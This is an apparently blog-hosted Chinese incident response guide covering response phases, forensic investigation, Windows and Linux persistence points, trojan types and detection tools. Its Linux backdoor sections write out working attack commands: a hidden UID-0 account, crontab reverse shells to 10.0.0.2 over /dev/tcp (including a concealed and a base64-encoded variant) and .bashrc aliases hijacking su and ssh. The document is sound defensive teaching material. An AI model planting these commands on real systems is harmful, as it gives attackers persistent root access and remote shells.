赞
踩
应急响应(Incident Response):
安全人员在遇到突发事件后所采取的措施和行动。突发事件:
发生在计算机系统或网络上威胁安全的事件。如黑客入侵、信息窃取等。事件响应:
信息安全生命周期的必要组成部分,这个生命周期包括:对策、检测和响应。场景:
运维人员无法迅速处理安全事件时,需要第三方厂商提供一种能发现并解决问题的有效服务手段。职责:
控制影响范围确保业务正常运转、还原攻击场景、找到问题根源、最后追溯攻击源。目的:
以最快速度恢复系统的保密性、完整性和可用性,阻止和减小安全事件带来的影响。目标:
积极预防、及时发现、快速反应、确保恢复。
1、通用型流程
1、准备(Preparation)
安全支撑平台:防火墙、入侵检测系统(IDS)等
日常安全管理:运维操作记录
应急预案:设备故障应急操作、攻击如何处理、获取外部支持、风险分析(规避措施)
2、检测(Detection)
主动发现:预警的及时性和全局性,为后续处理争取时间
被动发现:网络使用者的报告,业务用户的投诉
影响范围:单用户、多用户,已发生的、处于危险中的(还未发生)
3、分类(Classification)
攻击事件:大流量攻击、业务应用攻击
入侵事件:应用系统后门、web站点入侵
病毒事件:网络蠕虫病毒、ARP欺骗病毒
其他:网络或系统异常、敏感信息泄露
4、抑制(Containment)
已发生安全事件的:采取隔离、用边界控制设备防止网络区域内相互影响
处于危险中的:采取补救加固、漏洞扫描与修补、安全测试
5、根除(Eradication)
安全事件分析-了解危害程度-确定事件原因-针对性防范措施-是否有存在遗漏-调整平台安全策略
6、恢复(Recovery)
对主机和网络控制的恢复
从备份中恢复受损的数据
调整可能影响业务正常运转的策略
7、后续(Follow-up)
总结并指导今后的应急管理
必要时申请司法程序介入
2、个人总结的流程
步骤简述:接案–取证–分析侦察–锁定嫌疑人–结案
接案
1、因为攻击者经验、隐蔽性不足被发现
炫耀型——上传黑页、到此一游.txt
政治目的型——重点攻击政府站点、Anonymous(匿名者)
利益型——暗链、SEO推广、勒索、挖矿
抓鸡型——1433、mysql自动抓鸡、SSH暴力破解
持续型——长期潜伏式攻击、APT
DDOS攻击型——SYN Flood、CC攻击
蠕虫感染型——内网传播、Conficker、WannaCry
取证
1、保护第一现场
操作日志、应用日志
攻击者的残留文件
2、不轻信一面之词
与目击者交流相关细节
亲自核实所述、转述情况
分析侦察
1、三要素法-时间
攻击发现时间
-------目击者报案时间
后门文件时间
-------windows时间问题(创建时间等可以修改)
-------Linux下ctime(change time)
异常时间段内
-------web访问日志、操作系统认证日志、应用设备日志
2、三要素法-地点
webshell首次出现目录
-------上传漏洞——img_upload
-------代码执行——dedecms变量覆盖
-------后台上传——system_upload
残留文件所在目录
-------自动化攻击——批处理文件、shell脚本
-------人为上传\下载——桌面、下载目录
3、三要素法-事件
应用后台日志
-------登录日志——是否有非法账户
-------篡改记录——是否是从数据库修改
-------上传点——黑客最钟爱功能
web访问日志
-------SQL注入——order by
-------暴力破解——认证接口页面
-------代码执行——Struts2、java反序列化漏洞
对外应用访问日志
-------FTP访问日志——日志文件配置
-------SSH认证日志——Accept、Failed
操作历史记录
-------web运行账户——反弹执行命令
-------root用户——是否被提权
-------易受攻击账户——oracle、db2、weblogic
登录日志为二进制格式文件,无法被逐条删除(日志要么全清,要么完整)
—linux
-------wtmp—who -u /var/log/wtmp
-------btmp—last -f /var/log/btmp
-------lastlog—lastlog -f /var/log/lastlog
—windows
-------事件日志大小配置——默认覆盖
-------安全性事件——审核成功与失败
操作系统完整性检查
-------进程:非法程序、dll注入、/proc/PID
-------网络:监听端口、异常连接
-------账户:UID=0(注意Liunx下是无隐藏账号的)、administrators、admin$
-------启动项:crontab –l、inittab、rc.local、services.msc、msconfig
4、回溯攻击法
分析可能被攻击途径,进行模拟攻击
----主机监听端口整理
-------1、对应应用
-----------弱口令——FTP、SSH
-----------暴力破解——MYSQL、MSSQL
-----------代码执行——web攻击、应用漏洞
-------2、对外端口——防火墙策略
密码泄露
-------厂商应用口令——搜索引擎
-------数据库口令——web应用配置文件
中间人攻击
-------ARP攻击——劫持与嗅探
内部发起攻击
-------统一口令——windows域环境
-------溢出攻击——SMB缓冲区漏洞
5、经验法
攻击者常用的目录
-------/var/tmp、/tmp、/dev/shm、RECYCLER
特征文件
-------/tmp/angel_bc—phpspy木马反弹脚本
-------bqufe.sys(随机)—PcShare类远控木马
-------hxdef100.ini—Hacker Defender Rootkit
黑客惯用手法
-------操作系统后门:ushift后门、sshd backdoor
-------一句话木马:插入文件、php变形、包含图片
利用搜索功能
-------包含隐藏文件——Everything
-------n*24H内修改过的文件——find / -ctime -n
锁定嫌疑人
1、木马分析
静态逆向分析——IDA、OllyDbg
动态分析——抓包、内存截取
2、日志分析
web访问——webshell首次访问IP
登录记录——windows&linux
通过nmap扫描确认是否为跳板
结案
1、技术层面
漏洞确认及修补、后门清理与观察、涉及知识点学习、安全攻防技能培训
2、管理层面
报告整理输出、详细整改建议、攻击过程再现、流程制度规范
常用应急响应工具及常用命令如下:
常见工具-windows
- 系统启动相关:
- Autoruns 、Msconfig 、Net
- 系统进程分析监控:
- Process explorer、Process Monitor、Tasklist
- 端口网络状态:
- Tcpview、Currports、Netstat
- 综合安全检测:
- Wsyscheck、PowerTool、PCHunter、WIN64AST
常见工具-Linux
- rookit检查:
- Rkhunter、chkrookit、LiveCD引导拯救光盘
- 系统相关命令:
- ps、pstree、pmap、top、kill
- ls、strings、strace、readelf、rmp
- lsof、netstat
- chkconfig、crontab
通用检查工具
- Webshell检查:
- WebShellKill、HwsKill、Everything
- Webshell.py、find、grep、findstr
- 网络攻击相关:
- Sniffer Pro、WinArpAttacker
- Tcpdump、wireshark、Colasoft Capsa
- 日志分析工具:
- Logview、LogParse、EmEditor
1、常见的windows自启动方法
1、开始菜单\程序\启动
2、开机启动项(msconfig)
注册表:HKLM\Software\Microsoft\Windows\CurrentVersion\Run
3、注册为系统服务(services.msc)
4、任务计划启动(Schedule)
5、AUTOEXEC.BAT(NT 5.x)
6、系统程序替换 (ctfmon、conime)
7、组策略脚本(gpedit.msc)
2、特殊的windows自启动方式
1、Load加载
HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load
2、Winlogon加载
- HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit
- --管理系统各项启动顺序、逗号分隔加入其它程序
-
- HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify
- --关联特定的事件(安全模式启动)、产生事件通知时检查并调用相关DLL
3、映像劫持IFEO
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options
4、DLL劫持
lpk.dll、usp10.dll、ws2help.dll
5、关联特定程序
- HKEY_CLASSES_ROOT\txtfile\Shell\open\command
- HKLM\SOFTWARE\Microsoft\CommandProcessor\AutoRun
6、ActiveX自启动(DRAT2010)
HKLM\Software\Microsoft\ActiveSetup\InstalledComponents\{…}\stubpath
3、线程注入类木马
将自身线程注入到其他合法程序中,在宿主进程中,以线程的方式执行木马代码。以非进程方式执行代码,可以逃避进程查看器检查,实现进程隐藏。Process Explorer(增强任务管理器)、XueTr(手工杀毒软件)等工具具有查看结束线程以及挂起和恢复线程的功能。
代表木马:
灰鸽子远程控制(RAT)。工具:
Process Explorer、XueTr
4、ActiveX启动类木马
Active Setup键值:
--HKLM\Software\Microsoft\ActiveSetup\InstalledComponents
已安装windows组件信息(office、IE、OS)。每个键值作为相应组件在系统中的ID标示。进入桌面时先于其它自启动程序加载。
StubPath=%systemroot%\Trojan.exe
通过线程注入方式,实现木马自身功能。
代表木马:
彩虹桥远程监控木马(Bifrost)。工具:
PCHunter-手工杀毒软件
5、DLL注入类木马
由于windows系统服务过多,为了节省系统资源,微软将很多服务做成共享方式,交由svchost进程来启动。服务以dll形式实现,将执行程序指向svchost,由其调用相应服务的动态链接库文件来启动服务。
svchost作为宿主进程,并不提供任何服务系统。svchost是一个用于加载系统服务的宿主程序。此类木马更具迷惑性,同时容易绕过防火墙限制。
代表木马:
PcShare远程控制。工具:
Wsyscheck-系统检测工具
6、SSDT HOOK类木马
System Services Descriptor Table(系统服务描述符表)。将Ring3下的Win32 API和Ring0下内核API函数相互联系起来,即告诉系统,需要调用的API在什么地方。
通过修改SSDT表的函数地址可以对常用windows函数及API进行hook,如杀毒软件的主动防御功能即采用此接口来实现监控。利用驱动程序在ring0态将SSDT恢复为原始状态,即可使安全软件的主动防御和监控功能失效。
代表木马:
gh0st。工具:
PowerTool-手动杀毒辅助工具
7、windows常见后门
1、windows登陆界面:粘滞键(sethc)、放大镜(magnify)、屏幕键盘(osk)
2、密码截取记录:WinlogonHack、PwDump、wce
3、自启动相关:计划任务、组策略脚本、DLL劫持
4、其他:隐藏(克隆)账户、反弹程序
8、Linux自启动方式
- 1、/etc/rc.local 开机启动脚本
- 2、/etc/init.d/ 服务启动脚本
- 3、/etc/inittab 初始化配置文件
- 4、crond 自动调度任务(计划任务)
- 5、/etc/ld.so.preload 加载动态库.so文件
- 6、环境变量设置
- 如:/etc/profile、.bash_profile、.bash_login、.bash_logout
- 7、使用patch并编译的文件覆盖正常程序
9、Linux常见后门
1、自启动相关配置文件修改
useradd -u 0 -o -g root -G root r00t;echo r00t:p@ssw0rd | chpasswd
2、SetUID权限位
- chmod u+s /tmp/.bash
- find / -perm -4000
3、SSHD相关后门
- pam认证文件修改(pmap PID | grep security)
- sshd backdoor(rpm -vf /usr/sbin/sshd)
10、Linux--crontab后门
1、添加任务
(crontab -l;echo '*/1 * * * * exec 9<>/dev/tcp/10.0.0.2/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
2、隐藏任务
printf "*/1 * * * * exec 9<> /dev/tcp/10.0.0.2/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for 'whoami'%100c\n" | crontab -
3、base64编码
- exec 9<> /dev/tcp/10.0.0.2/53;exec 0<&9;exec 1>&9
- (echo '*/1 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvMTAuMC4wLjIvN =="|base64 –d`;/bin/bash -c "$a";unset a')|crontab -
- #注意闭合符号的组合
11、Linux—bash shell后门
1、.bash_profile
用户设置的环境变量,在登陆时执行,调用bashrc
2、.bashrc
登录及打开shell时读取执行,继承profile中变量
3、设置别名与函数。修改.bashrc文件
- alias su="~/.subtty su"
- alias ssh="~/.subtty ssh“
- if [ -z "$SUBTTY" ]; then exec ~/.subtty; fi
12、Linux下相关工具
1、tripwire
文件系统完整性检查,建立指纹数据库。大小、HASH、所有者、群组、存取权限等
2、chkrootkit、rootkit hunter
恶意程序安全查杀工具。rootkit、后门、漏洞利用程序。基于特征关键字检索,可被绕过
13、Linux下手工分析
1、RPM包可信校验
rpm -Vf (ps/pstree/lsof/kill/netstat/ls/dir/find/sshd)
2、进程查看:
pstree / ps -aux (START列为程序开始运行时间)
3、端口状态及网络连接
- netstat -lntp (非root用户只能看到部分连接的PID)
- lsof -Pnl -i tcp:80
4、进程文件路径
ls -l /proc/PID/exe
5、结束进程
- killall httpd
- kill -9 “ps -ef | grep test | awk '{print $2}'”
6、状态检查
- top(内存/CPU排序)、lsmod(内核模块)
- ls -last(按修改时间排序)、stat(文件访问、修改、状态改动时间)
7、启动项检查
- ls -lh /var/spool/cron/
- chkconfig --list |grep 3:on
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。